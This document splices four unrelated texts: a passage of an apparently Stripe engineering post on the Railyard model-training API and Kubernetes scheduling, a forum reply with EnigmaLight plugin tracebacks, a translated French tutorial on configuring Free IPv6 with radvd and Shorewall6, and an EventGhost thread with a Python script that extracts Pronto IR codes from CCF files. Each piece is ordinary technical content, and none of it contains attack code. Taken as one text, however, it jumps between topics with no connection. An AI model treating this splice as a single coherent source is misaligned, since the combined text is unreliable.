Teams start adopting Railyard with an API specification and a workflow that defines a train method to train a classifier with the data fetched from the API request. The StripeMLWorkflow interface supports extensive customization to adapt to different training approaches and model types. You can preprocess your data before it gets passed in to the train function, define your own data fetching implementation, specify how you want training/holdout data to be scored, and run any other Python code you need. For example, some of our deep learning models have custom data fetching code to stream batches of training data for model training. When your training job finishes you'll end up with two outputs: a model identifier for your serialized model that can be put into production, and your evaluation data in S3.
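As a hedged sketch of that kind of customization (StripeMLWorkflow is Stripe-internal, so the stub base class and the attribute names data_path, classifier_features, classifier_label, and custom_params are assumptions for illustration; only the hook names fetch_data, preprocess, and train come from the interfaces described in this post), a workflow that overrides data fetching and preprocessing might look like this:
import pandas as pd
import xgboost


class StripeMLWorkflow:  # stand-in for the real (internal) base class
    def __init__(self, **params):
        self.__dict__.update(params)


class CustomFraudModel(StripeMLWorkflow):
    def fetch_data(self):
        # Override the default data fetching, e.g. to read a bespoke format
        # or stream batches; here we just read a Parquet path.
        return pd.read_parquet(self.data_path)

    def preprocess(self, dataframe):
        # Runs before train(): drop rows without labels and clip outliers.
        dataframe = dataframe.dropna(subset=[self.classifier_label])
        dataframe["charge_amount"] = dataframe["charge_amount"].clip(upper=10_000)
        return dataframe

    def train(self, training_dataframe, holdout_dataframe):
        estimator = xgboost.XGBRegressor(**self.custom_params)
        return estimator.fit(
            training_dataframe[self.classifier_features],
            training_dataframe[self.classifier_label],
        )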
If you build a machine learning API specification, here are a few things to keep in mind:
Interfaces are important. Users will want to load and transform data in ways you didn't anticipate, train models using unsupported patterns, and write out unfamiliar types of evaluation data. It's important to provide standard API interfaces like fetch_data, preprocess, train, and write_evaluation_data that specify some standard data containers (e.g., Pandas DataFrame and Torch Dataset) but are flexible in how they are generated and used.
Users should not need to think about model serialization or persistence. Reducing their cognitive burden makes their lives easier and gives them more time to be creative and focus on modeling and feature engineering. Data scientists and ML engineers already have enough to think about between feature engineering, modeling, evaluation, and more. They should be able to train and hand over their model to your scoring infrastructure without ever needing to think about how it gets serialized or persisted.
Define metrics for each step of the training workflow. Make sure you're gathering fine-grained metrics for each training step: data loading, model training, model serialization, evaluation data persistence, etc. We store high-level success and failure metrics that can be examined by team, project, or the individual machine performing the training. On a functional level, our team uses these metrics to debug and profile long-running or failed jobs, and provide feedback to the appropriate team when there's a problem with a given training job. And on a collaborative level, these metrics have changed how our team operates. Moving from a reactive stance ("My model didn't train, can you help?") to a proactive one ("Hey, I notice your model didn't train, here's what happened") has helped us be better partners to the many teams we work with.
Scaling Kubernetes
Railyard coordinates hundreds of machine learning jobs across our cluster, so effective resource management across our instances is crucial. The first version of Railyard simply ran individual subprocesses from the Scala service that manages all jobs across our cluster. We would get a request, start Java’s ProcessBuilder, and kick off a subprocess to build a Python virtualenv and train the model. This basic implementation allowed us to quickly iterate on our API in our early days, but managing subprocesses wasn’t going to scale very well. We needed a proper job management system that met a few requirements:
Scaling the cluster quickly for different resource/instance types
Routing models to specific instances based on their resource needs
Job queueing to prioritize resources for pending work
Luckily, our Orchestration team had been working hard to build a reliable Kubernetes cluster and suggested this new cluster would be a good platform for Railyard’s needs. It was a great fit; a fully managed Kubernetes cluster provides all of the pieces we needed to meet our system’s requirements.
Containerizing Railyard
To run Railyard jobs on Kubernetes, we needed a way to reliably package our Python code into a fully executable binary. We use Google’s Subpar library which allows us to package all of our Python requirements and source code into a single .par file for execution. The library also includes support for the Bazel build system out of the box. Over the past few years, Stripe has been moving many of its builds to Bazel; we appreciate its speed, correctness, and flexibility in a multi-language environment.
With Subpar you can define an entrypoint to your Python executable and Bazel will build your .par executable to bundle into a Dockerfile:
par_binary(
    name = "railyard_train",
    srcs = ["@.../ml:railyard_srcs"],
    data = ["@.../ml:railyard_data"],
    main = "@.../ml:railyard/train.py",
    deps = all_requirements,
)
With the Subpar package built, the Kubernetes command only needs to execute it with Python:
command: ["sh"]
args: ["-c", "python /railyard_train.par"]
Within the Dockerfile we package up any other third-party dependencies that we need for model training, such as the CUDA runtime to provide GPU support for our PyTorch models. After our Docker image is built, we deploy it to AWS’s Elastic Container Repository so our Kubernetes cluster can fetch and run the image.
Running diverse workloads
Some machine learning tasks can benefit from a specific instance type with resources optimized for a given workload. For example, a deep learning task may be best suited for a GPU instance while fraud models that employ huge datasets should be paired with high-memory instances. To support these mixed workloads we added a new top-level field to the Railyard API request to specify the compute resource for jobs running on Kubernetes:
{
"compute_resource": "GPU"
}
Railyard supports training models on CPU, GPU, or memory-optimized instances. Models for our largest datasets can require hundreds of gigabytes of memory to train, while our smaller models can train quickly on smaller (and less expensive) instance types.
Scheduling and distributing jobs
Railyard exerts a fine-grained level of control on how Kubernetes distributes jobs across the cluster. For each request, we look at the requested compute resource and set both a Kubernetes Toleration and an Affinity to specify the type of node that we would like to run on. These parameters effectively tell the Kubernetes cluster:
the affinity, or which nodes the job should run on
the toleration, or which nodes should be reserved for specific tasks
Kubernetes will use the affinity and toleration properties for a given Kubernetes pod to compute how jobs should be best distributed across or within each node.
Kubernetes supports per-job CPU and memory requirements to ensure that workloads don’t experience resource starvation due to neighboring jobs on the same host. In Railyard, we determine limits for all jobs based on their historic and future expected usage of resources. In the case of high-memory or GPU training jobs, these limits are set so that each job gets an entire node to itself; if all nodes are occupied, then the scheduler will place the job in a queue. Jobs with less intensive resource requirements are scheduled on nodes to run in parallel.
With these parameters in place, we can lean on the Kubernetes resource scheduler to balance our jobs across available nodes. Given a set of job and resource requests, the scheduler will intelligently distribute those jobs to nodes across the cluster.
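Railyard itself is a Scala service that talks to the Kubernetes API directly, but as a rough sketch of the affinity, toleration, and resource-limit mechanics described above, here is how a comparable job submission could look with the official Kubernetes Python client; the label key, taint, namespace, resource numbers, and image are illustrative assumptions, not Stripe's actual configuration:
from kubernetes import client, config

def submit_training_job(job_name: str, image: str, compute_resource: str = "GPU"):
    config.load_kube_config()  # or load_incluster_config() inside the cluster

    # Only schedule onto nodes labeled with the requested resource type...
    affinity = client.V1Affinity(
        node_affinity=client.V1NodeAffinity(
            required_during_scheduling_ignored_during_execution=client.V1NodeSelector(
                node_selector_terms=[client.V1NodeSelectorTerm(
                    match_expressions=[client.V1NodeSelectorRequirement(
                        key="railyard/compute-resource",
                        operator="In",
                        values=[compute_resource])])])))
    # ...and tolerate the taint that reserves those nodes for training jobs.
    toleration = client.V1Toleration(
        key="railyard/compute-resource", operator="Equal",
        value=compute_resource, effect="NoSchedule")

    container = client.V1Container(
        name="train",
        image=image,
        command=["sh", "-c", "python /railyard_train.par"],
        # Per-job requests/limits keep neighboring jobs from starving each other.
        resources=client.V1ResourceRequirements(
            requests={"cpu": "4", "memory": "16Gi"},
            limits={"memory": "16Gi"}))

    job = client.V1Job(
        api_version="batch/v1",
        kind="Job",
        metadata=client.V1ObjectMeta(name=job_name),
        spec=client.V1JobSpec(
            backoff_limit=0,
            template=client.V1PodTemplateSpec(
                spec=client.V1PodSpec(
                    restart_policy="Never",
                    affinity=affinity,
                    tolerations=[toleration],
                    containers=[container]))))

    client.BatchV1Api().create_namespaced_job(namespace="railyard", body=job)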
One year later: running at scale
Moving our training jobs to a Kubernetes cluster has enabled us to rapidly spin up new resources for different models and expand the cluster to support more training jobs. We can use a single command to expand the cluster and new instance types only require a small configuration change. When the memory requirements of running jobs outgrew our CPU-optimized instance types, we started training on memory-optimized instances the very next day; when we observe a backlog of jobs, we can immediately expand the cluster to process the queue. Model training on Kubernetes is available to any data scientist or engineer at Stripe: all that’s needed is a Python workflow and an API request and they can start training models on any resource type in the cluster.
To date, we’ve trained almost 100,000 models on Kubernetes, with new models trained each day. Our fraud models automatically retrain on a regular basis using Railyard and Kubernetes, and we’re steadily moving more of Stripe’s models onto an automated retraining cycle. Radar’s fraud model is built on hundreds of distinct ML models and has a dedicated service that trains and deploys all of those models on a daily cadence. Other models retrain regularly using an Airflow task that uses the Railyard API.
We’ve learned a few key considerations for scaling Kubernetes and effectively managing instances:
Instance flexibility is really important. Teams can have very different machine learning workloads. In any given day we might train thousands of time series forecasts, a long-running word embedding model, or a fraud model with hundreds of gigabytes of data. The ability to quickly add new instance types and expand the cluster are equally important for scalability.
Managing memory-intensive workflows is hard. Even using various instance sizes and a managed cluster, we still sometimes have jobs that run out of memory and are killed. This is a downside to providing so much flexibility in the Python workflow: modelers are free to write memory-intensive workflows. Kubernetes allows us to proactively kill jobs that are consuming too many resources, but it still results in a failed training job for the modeler. We're thinking about ways to better manage this, including smart retry behavior to automatically reschedule failed jobs on higher-capacity instances and moving to distributed libraries like dask-ml.
Subpar is an excellent solution for packaging Python code. Managing Python dependencies can be tricky, particularly when you'd like to bundle them as an executable that can be shipped to different instances. If we were to build this from scratch again we would probably take a look at Facebook's XARs, but Subpar is very compatible with Bazel and it's been running well in production for over a year.
Having a good Kubernetes team is a force multiplier. Railyard could not have been a success without the support of our Orchestration team, which manages our Kubernetes cluster and pushes the platform forward for the whole organization. If we had to manage and operate the cluster in addition to building our services, we would have needed more engineers and taken significantly longer to ship.
Building ML infrastructure
We’ve learned that building common machine learning infrastructure enables teams across Stripe to operate independently and focus on their local ML modeling goals. Over the last year we’ve used Railyard to train thousands of models spanning use cases from forecasting to deep learning. This system has enabled us to build rich functionality for model evaluation and design services to optimize hyperparameters for our models at scale.
While there is a wealth of information available on data science and machine learning from the modeling perspective, there isn’t nearly as much published about how companies build and operate their production machine learning infrastructure. Uber, Airbnb, and Lyft have all discussed how their infrastructure operates, and we’re following their lead in introducing the design patterns that have worked for us. We plan to share more lessons from our ML architecture in the months ahead. In the meantime, we’d love to hear from you: please let us know which lessons are most useful and if there are any specific topics about which you’d like to hear more.
|
Thanks for the update.
But I think the error is still the same.
Unhandled Error
Traceback (most recent call last):
File "/usr/lib/enigma2/python/mytest.py", line 179, in runReactor
reactor.run(installSignalHandlers=False)
File "/usr/lib/python2.7/site-packages/twisted/internet/base.py", line 1169, in run
self.mainLoop()
File "/usr/lib/enigma2/python/e2reactor.py", line 200, in mainLoop
runMainloop()
File "/usr/lib/enigma2/python/e2reactor.py", line 170, in simulate
self.runUntilCurrent()
--- <exception caught here> ---
File "/usr/lib/python2.7/site-packages/twisted/internet/base.py", line 773, in runUntilCurrent
f(*a, **kw)
File "/usr/lib/enigma2/python/Plugins/Extensions/EnigmaLight/EL_MainMenu.py", line 249, in showButtons
if self.controller != None:
exceptions.AttributeError: 'EL_Screen_MainMenu' object has no attribute 'controller'
Unhandled Error
Traceback (most recent call last):
File "/usr/lib/enigma2/python/mytest.py", line 179, in runReactor
reactor.run(installSignalHandlers=False)
File "/usr/lib/python2.7/site-packages/twisted/internet/base.py", line 1169, in run
self.mainLoop()
File "/usr/lib/enigma2/python/e2reactor.py", line 200, in mainLoop
runMainloop()
File "/usr/lib/enigma2/python/e2reactor.py", line 170, in simulate
self.runUntilCurrent()
--- <exception caught here> ---
File "/usr/lib/python2.7/site-packages/twisted/internet/base.py", line 773, in runUntilCurrent
f(*a, **kw)
File "/usr/lib/enigma2/python/Plugins/Extensions/EnigmaLight/EL_MainMenu.py", line 245, in setStatusBarTxt
self["txt_statusbar"].setText(text)
exceptions.KeyError: 'txt_statusbar'
The colors are still displayed incorrectly, though.
White and black are OK, but a blue picture is shown as red and a red picture as blue.
Is something wrong on my end?
The Color Sequence setting does not seem to work.
When saving, the error mentioned above appears (Enigma log).
Oh, and the enigmalight_gui_crash log contains the following:
Traceback (most recent call last):
File "/usr/lib/enigma2/python/Plugins/Extensions/EnigmaLight/EL_Control.py", line 220, in readInfo
self.current_resolution = text[1]
IndexError: list index out of range
|
Free, one of the pioneering ISPs in IPv6 deployment, lets you have an IPv6 network at home, quite simply, under Linux. Good timing, because switching is becoming urgent: the address shortage is at our door.
In 2007 Free deployed IPv6 at lightning speed using a variant of 6to4: 6rd (rd = rapid deployment). This variant gives the Freebox a full network of 2^64 public addresses, i.e. more personal IPs than all the IPv4 addresses available on the entire Internet!
But what do you do if you use the FreeBox in modem mode, that is without seeing the FreeBox itself and therefore without a network between it and the subscriber's equipment?
In my case I have a server that also acts as a router. It is configured with a static IP on the FreeBox modem side. I would like to add to it the IPv6 network that has been allocated to me and move to a dual IPv4/IPv6 stack.
Although the 6rd variant is based on a 6to4 tunnel, it can be considered native IPv6, since you get a real IPv6 prefix associated with Free's network; the first bits indicate that this is non-encapsulated IPv6 corresponding to a prefix allocated to Free.
There is one small subtlety, however: the following bits correspond to the public IPv4 address that Free assigns to each subscriber, which means you cannot have such an address without IPv4; that does not help our shortage problem. Still, Free will eventually hand out IPv6-only addresses once everyone has switched to full IPv6. Let's revisit that in a few years.
Enabling IPv6
So let's now enable IPv6 on our Linux router:
log in to the Freebox 'console' interface
enable IPv6 in the Internet options
reboot the FreeBox
And that's it: your Linux server, or any PC you plug into the FreeBox, is very likely to be immediately reachable over IPv6, and you have just made your server/router vulnerable, because most likely no firewall is enabled for it. Don't count on your iptables rules or your Shorewall (or pfbuilder) either: IPv6 filtering is completely separate from the IPv4 side.
In fact, as soon as the FreeBox enables IPv6 it sends radv (router advertisement) messages on the network linking it to your Linux server, and since that server almost certainly has IPv6 support enabled by default, it's in the bag.
A small note: all of this configuration is done on GNU/Linux Debian. The Debian wiki has a section on the subject.
Let's still check, on the Linux side, that IPv6 is indeed supported. A simple ip addr should be enough, since every Ethernet network interface automatically gets a link-local IPv6 address:
server:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 40:61:86:34:28:58 brd ff:ff:ff:ff:ff:ff
inet 82.224.154.135/24 brd 82.224.154.255 scope global eth0
inet6 2a01:e35:2e09:a870:4261:86ff:fe34:2858/64 scope global dynamic
valid_lft 86224sec preferred_lft 86224sec
inet6 fe80::4261:86ff:fe34:2858/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 100
link/ether 00:0e:0c:80:fb:8c brd ff:ff:ff:ff:ff:ff
inet 10.0.0.1/24 brd 10.0.0.255 scope global eth1
inet6 fe80::20e:cff:fe80:fb8c/64 scope link
valid_lft forever preferred_lft forever
Here eth0 is the public-facing interface (the one connected to the FreeBox) and eth1 the private local network.
We do have inet6 entries, including one with scope link on eth0. That is a restricted IP (it starts with fe80::) used to communicate on the LAN attached to the interface: it lets the machine talk to the other servers on that LAN, send announcements, and answer broadcasts. The IP 2a01:e35:2e09:a870:4261:86ff:fe34:2858 is the one we obtain through automatic configuration, and it sits in a /64 LAN all to ourselves.
By sniffing the local network connected to the FreeBox we can see the router advertisements containing the IPv6 prefix that Free assigns to each subscriber's personal public network. These advertisements are what let the network interface auto-configure dynamically in stateless mode; no DHCP server is needed in this scenario. The interface's IPv6 address is built from this prefix and the card's MAC address:
server:/etc/shorewall6# tcpdump -i eth0 -v ip6
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
01:05:00.746795 IP6 (hlim 255, next-header ICMPv6 (58) payload length: 104) fe80::207:cbff:fe10:ce97 > ip6-allnodes: [icmp6 sum ok] ICMP6, router advertisement, length 104
hop limit 64, Flags [none], pref medium, router lifetime 1800s, reachable time 0s, retrans time 0s
prefix info option (3), length 32 (4): 2a01:e35:2e09:a870::/64, Flags [onlink, auto], valid time 86400s, pref. time 86400s
rdnss option (25), length 40 (5): lifetime 600s, addr: dns3.proxad.net addr: dns2.proxad.net
mtu option (5), length 8 (1): 1480
source link-address option (1), length 8 (1): 00:07:cb:10:ce:97
With Wireshark we see the same advertisement (screenshot in the original article), and we even get the IPv6 addresses of the DNS servers.
Now is the time to check that the Linux server/router really has IPv6 access to the outside world.
There is a site that was set up for World IPv6 Day for exactly this purpose. Launching Firefox (or Iceweasel) from the Linux router, you should get a passing result, along with the test details (screenshots in the original article).
Note: World IPv6 Day has already passed, but the site remains a good test tool.
Access to the private network
We now need to open up access for the machines on the private LAN. There are several possible approaches:
create an IPv6 subnet and route it through the firewall; in that case a few proxy features are needed. See the Gentoo wiki article.
use an Ethernet bridge to 'merge' the two networks, as if all machines were attached to the FreeBox LAN. See the article by Sébastien Chaumontet.
use classic routing on the IPv6 network while making it look as though all hosts are on the Freebox LAN.
We will go with the third solution, which does not require too much tinkering.
To begin with, we will announce our IPv6 prefix and the default IPv6 route to the internal hosts:
install, on our Linux router, the radvd daemon, which will announce to the internal hosts the prefix Free has assigned us; this daemon also advertises the default route to the internal hosts, that route necessarily being our Linux router (this cannot be changed):
Enable IPv6 routing in the kernel, in /etc/sysctl.conf:
net.ipv6.conf.all.forwarding=1
and to apply the changes immediately:
sysctl -p
Install the radvd service:
apt-get install radvd
Configure the radvd daemon in /etc/radvd.conf:
interface eth1
{
AdvSendAdvert on;
prefix 2a01:e35:2e09:a870::/64
{
AdvOnLink on;
};
};
The important points in this configuration are:
set the internal LAN interface in the 'interface' parameter; this is the LAN containing your private hosts, not the freebox<->linux-router LAN.
set the prefix Free assigned you in the 'prefix' parameter; this prefix was found during the network capture with Wireshark, in the 'prefix' option of the ICMPv6 Option field of the ICMP packet.
Once the service has been restarted with a simple /etc/init.d/radvd restart, the internal hosts obtain a public IPv6 address in addition to the link-local IP (and to the private IPv4), plus a default IPv6 route (alongside the default IPv4 route); for example:
antoine@pcantoine:~$ ip -6 addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qlen 1000
inet6 2a01:e35:2e09:a870:21d:60ff:fe6d:9988/64 scope global dynamic
valid_lft 86162sec preferred_lft 14162sec
inet6 fe80::21d:60ff:fe6d:9988/64 scope link
valid_lft forever preferred_lft forever
antoine@pcantoine:~$ ip -6 route
2a01:e35:2e09:a870::/64 dev eth0 proto kernel metric 256 expires 86039sec
fe80::/64 dev eth0 proto kernel metric 256
default via fe80::20e:cff:fe80:fb8c dev eth0 proto kernel metric 1024 expires 1428sec
The assigned address is the line
inet6 2a01:e35:2e09:a870:21d:60ff:fe6d:9988/64 scope global dynamic, which shows a public (global) address whose beginning matches our Free prefix.
The IPv6 default route, default via
fe80::20e:cff:fe80:fb8c, does point to the Linux router. This is the router's link-local address on the internal LAN (between the router and the internal hosts).
We are on the right track: the hosts' IPv6 packets will now take the right path out to the Internet. A few details remain to be sorted out: the return path of packets from the Internet and the firewall configuration.
It is important to understand that in IPv6 address translation is not natural, so without filtering every host is immediately reachable from the outside. For the firewall we will use Shorewall6, which also offers an
"IPv6 – Proxy the neighbors" feature (a sort of equivalent of proxy ARP). It is this neighbor proxy that lets us build a pseudo-bridge. Neighbor proxying consists of announcing the internal hosts on the external LAN via ICMPv6, which makes the FreeBox believe the hosts sit directly on the FreeBox<->Linux-router LAN. The Linux router picks up the packets and then uses 'traditional' routing to forward the incoming packets.
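As an aside (not something covered by the original setup, just for context): the neighbor-proxy trick can also be done by hand with the kernel and iproute2 tools, which is essentially what Shorewall6 drives for us through its proxyndp file. For a single host it boils down to something like:
sysctl -w net.ipv6.conf.eth0.proxy_ndp=1
ip -6 neigh add proxy 2a01:e35:2e09:a870:21d:60ff:fe6d:9988 dev eth0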
Install Shorewall6:
apt-get install shorewall6
and enable it in the file
/etc/default/shorewall6:
startup=1
then fill in the neighbor-proxy file and define the basic filtering; example with 2 internal hosts:
root@server:/etc/shorewall6/proxyndp
#ADDRESS INTERFACE EXTERNAL HAVEROUTE PERSISTENT
2a01:e35:2e09:a870:21d:60ff:fe6d:9988 eth1 eth0
2a01:e35:2e09:a870::2 eth0 eth1
root@server:/etc/shorewall6#
eth1 being the internal LAN interface on the Linux router and eth0 the public LAN on the Freebox side.
for the basic filtering (outbound Internet allowed, inbound from the Internet blocked):
root@server:/etc/shorewall6/interfaces
#
# Shorewall version 4.0 - Sample Interfaces File for two-interface configuration.
# Copyright (C) 2006 by the Shorewall Team
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# See the file README.txt for further details.
#------------------------------------------------------------------------------
# For information about entries in this file, type "man shorewall-interfaces"
#
# The manpage is also online at
# http://shorewall.net/manpages/shorewall-interfaces.html
#
###############################################################################
#ZONE INTERFACE BROADCAST OPTIONS
net eth0 detect tcpflags
loc eth1 detect tcpflags
#lg tun0 detect tcpflags
#virt virbr0 detect tcpflags
#LAST LINE -- ADD YOUR ENTRIES BEFORE THIS ONE -- DO NOT REMOVE
root@server:/etc/shorewall6/zones
#
# Shorewall version 4.0 - Sample Zones File for two-interface configuration.
# Copyright (C) 2006 by the Shorewall Team
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# See the file README.txt for further details.
#------------------------------------------------------------------------------
# For information about entries in this file, type "man shorewall-zones"
#
# The manpage is also online at
# http://shorewall.net/manpages/shorewall-zones.html
#
###############################################################################
#ZONE TYPE OPTIONS IN OUT
# OPTIONS OPTIONS
fw firewall
net ipv6
loc ipv6
#lg ipv6
#virt ipv6
#LAST LINE - ADD YOUR ENTRIES ABOVE THIS ONE - DO NOT REMOVE
root@server:/etc/shorewall6/policy
#
# Shorewall version 4.0 - Sample Policy File for two-interface configuration.
# Copyright (C) 2006 by the Shorewall Team
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# See the file README.txt for further details.
#------------------------------------------------------------------------------
# For information about entries in this file, type "man shorewall-policy"
#
# The manpage is also online at
# http://shorewall.net/manpages/shorewall-policy.html
#
###############################################################################
#SOURCE DEST POLICY LOG LEVEL LIMIT:BURST
#
# Note about policies and logging:
# This file contains an explicit policy for every combination of
# zones defined in this sample. This is solely for the purpose of
# providing more specific messages in the logs. This is not
# necessary for correct operation of the firewall, but greatly
# assists in diagnosing problems. The policies below are logically
# equivalent to:
#
# loc net ACCEPT
# net all DROP info
# all all REJECT info
#
# The Shorewall-perl compiler will generate the individual policies
# below from the above general policies if you set
# EXPAND_POLICIES=Yes in shorewall.conf.
#
# Policies for traffic originating from the local LAN (loc)
#
# If you want to force clients to access the Internet via a proxy server
# on your firewall, change the loc to net policy to REJECT info.
#loc net ACCEPT
#loc $FW ACCEPT
loc all ACCEPT
#virt all ACCEPT
#
# Policies for traffic originating from the firewall ($FW)
#
# If you want open access to the Internet from your firewall, change the
# $FW to net policy to ACCEPT and remove the 'info' LOG LEVEL.
# This may be useful if you run a proxy server on the firewall.
#$FW net ACCEPT
#$FW loc ACCEPT
$FW all ACCEPT
#
# Policies for traffic originating from the Internet zone (net)
#
#net $FW DROP info
#net loc DROP info
net all DROP
# THE FOLLOWING POLICY MUST BE LAST
all all REJECT
#LAST LINE -- ADD YOUR ENTRIES ABOVE THIS LINE -- DO NOT REMOVE
root@server:/etc/shorewall6/rules
#
# Shorewall version 4.0 - Sample Rules File for two-interface configuration.
# Copyright (C) 2006,2007 by the Shorewall Team
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# See the file README.txt for further details.
#------------------------------------------------------------------------------
# For information about entries in this file, type "man shorewall-rules"
#
# The manpage is also online at
# http://shorewall.net/manpages/shorewall-rules.html
#
#############################################################################################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK
Ping/ACCEPT net all
Ping/ACCEPT $FW all
Ping/ACCEPT loc all
SSH/ACCEPT net $FW
HTTP/ACCEPT net $FW
DNS/ACCEPT net $FW
ACCEPT net $FW tcp 5222
#DNAT net loc:10.0.0.10 udp 31336 -
#DNAT net:83.167.38.34 virt:192.168.122.40 tcp 3389 -
#
## Emule
#ACCEPT net $FW tcp 4662
#ACCEPT net $FW udp 4676
#ACCEPT net $FW udp 4672
#
## BitTorrent
#ACCEPT net $FW tcp 6881
#ACCEPT net $FW tcp 6882
#LAST LINE -- ADD YOUR ENTRIES BEFORE THIS ONE -- DO NOT REMOVE
There we go; we can now run a few validation tests from one of the internal PCs; for example:
antoine@pcantoine:~$ host www.free.fr
www.free.fr has address 212.27.48.10
www.free.fr has IPv6 address 2a01:e0c:1:1599::1
antoine@pcantoine:~$ ping6 -c 3 www.free.fr
PING www.free.fr(www.free.fr) 56 data bytes
64 bytes from www.free.fr: icmp_seq=1 ttl=59 time=73.4 ms
64 bytes from www.free.fr: icmp_seq=2 ttl=59 time=20.4 ms
64 bytes from www.free.fr: icmp_seq=3 ttl=59 time=20.7 ms
--- www.free.fr ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 20.424/38.200/73.434/24.915 ms
antoine@pcantoine:~$ lynx "http://[2a01:e0c:1:1599::1]"
...
and finally, access to the IPv6 Day page from a PC on the internal LAN:
We can see that the IPv6 address is indeed public and starts with the same prefix as the Linux router's public IPv6 address (otherwise there would be no chance of it working), while the IPv4 address is the single available IP, which is NATed at the router.
We thus get one fixed public IPv6 address per host configured in the proxy.
This setup is not ideal, because:
each IPv6 host must be declared in the file /etc/shorewall6/proxyndp
the MAC address of each host made reachable over IPv6 this way is exposed publicly, since it is encoded (and barely masked) by the stateless autoconfiguration mechanism in place.
On the other hand, and thanks to the very design of IPv6, each host is no longer subject to (source) NAT at the firewall, so the address-translation headaches (a real pain for anything involving audio/video streams such as video conferencing) between two private hosts on the Internet are a thing of the past. But that still requires most users to move to this new protocol, which is far from a given.
See you soon
Antoine
|
Hi guys
I have recently acquired a Tact Millennium amplifier. It's very old so the possibility of finding an original remote is slim.
Someone had uploaded a CCF file based on the remote to www.remotecentral.com.
I have utilised EventGhost many times with a USB receiver, it's a great piece of software! I am wondering if it would be possible to handle said CCF file and "blast" the codes from a USB transmitter to the amp. If it works, I can then use the learning function on my universal remote to store them.
I am also looking into utilising the IR blaster on my Samsung S5 phone, but I am more familiar with EventGhost than Android.
Any advice or comments would be greatly appreciated!
Thanks
kgschlosser
Site Admin
Posts:5508
Joined:Fri Jun 05, 2015 5:43 am
Location:Rocky Mountains, Colorado USA
never mind about the ccf file
download and install this program
http://files.remotecentral.com/view/582 ... oedit.html
it is a pronto editor.
once you have the editor installed go ahead and run it. then open the ccf file
File --> Open Configuration
Once you have the file opened up it may ask you if you want to convert it. You can say ok; this only happens because the file may be for a pronto remote that is different than the one you selected when you first opened up the program.
you need to expand "Devices" in the left pane. then expand the device that is listed under it.
The items in []'s are GUIs that get displayed on the remote. each screen is going to have a bunch of different buttons for the device. so go ahead and double click on one of them.
You will see the various buttons. right click on one of the buttons and then click on properties. the Button Properties dialog will open up. The Action tab should be what you are seeing. on the left side there will be a vertical row of buttons and on the right there is going to be a white box. in that white box there will be one or more items. double click on one of the items. the Add IR dialog is going to open up. just above the OK button and a little to the left there is a button "View IR"; click on that button. you will now be able to see the pronto code for that button. that is what you will need to paste into the Transmit IR action in EG.
You are going to have to do this for each and every button on each of the available GUI screens. I know it is kind of a pain to do. but this is the only "free" way to do it. There is a program called Extract CCF that will spit out all of the pronto codes but I believe you have to pay for it.
kgschlosser
Site Admin
Posts:5508
Joined:Fri Jun 05, 2015 5:43 am
Location:Rocky Mountains, Colorado USA
OK so scratch the above directions as that is going to be a royal pain
I have a better way.
create a folder on your desktop called "ccf_converter"
unzip the attached file into that folder. there is only a single dll in the file.
place any ccf files you want converted into that folder as well. It will bulk extract the pronto codes and button names.
create a new macro in EG and add a Python Script action. Paste the code below into that script. Click on "Apply" and then click on "Test"; it will dump all of the button names and pronto codes into the EG log.
Code: Select all
import ctypes
from ctypes.wintypes import INT
import os
import shutil

# Flag telling CCFDll.dll to dump the IR codes
CCF_DUMP_CODES = 0x00000010

# Folder on the desktop that holds CCFDll.dll and the .ccf files
path = os.path.join(os.path.expanduser('~'), 'desktop', 'ccf_converter')

hCCFDll = ctypes.cdll.LoadLibrary(os.path.join(path, 'CCFDll.dll'))
CCFRunDumper = hCCFDll.CCFRunDumper
CCFRunDumper.restype = ctypes.POINTER(INT)

for ccf_file in os.listdir(path):
    if not ccf_file.endswith('.ccf'):
        continue

    print ccf_file

    # Run the dumper; it writes its output into a 'codes' subfolder
    szInputCCF = ctypes.create_string_buffer(os.path.join(path, ccf_file))
    szOutputDirectory = ctypes.create_string_buffer(path)
    DumpFlags = INT(CCF_DUMP_CODES)
    CCFRunDumper(szInputCCF, szOutputDirectory, DumpFlags)

    # Pull the button name and pronto code back out of each dumped file
    for code_file in os.listdir(os.path.join(path, 'codes')):
        code_file = os.path.join(os.path.join(path, 'codes', code_file))
        with open(code_file, 'r') as f:
            data = f.read()

        data = data.split('</tr>')[2:-2]
        code = [line.strip() for line in data[0].split('\n') if line.strip()][-1]
        code = code.split('","')[-1].split('")')[0]
        name = [line.strip() for line in data[-1].split('\n') if line.strip()][-2]
        name = name.split('">')[-1].split('</')[0]
        print name, ':', code
        print
    print

    shutil.rmtree(os.path.join(path, 'codes'))
Attachments
CCFDll.zip
(393.88 KiB) Downloaded 64 times
I've managed to open the file using CCF extractor. However, it was made in 2002 and is non-standard somehow, so it won't convert automatically. CCF extractor could still view the codes, which I then copied and pasted into the iRPlus online XML converter...
https://irplus-remote.github.io/converter/rcentral.html
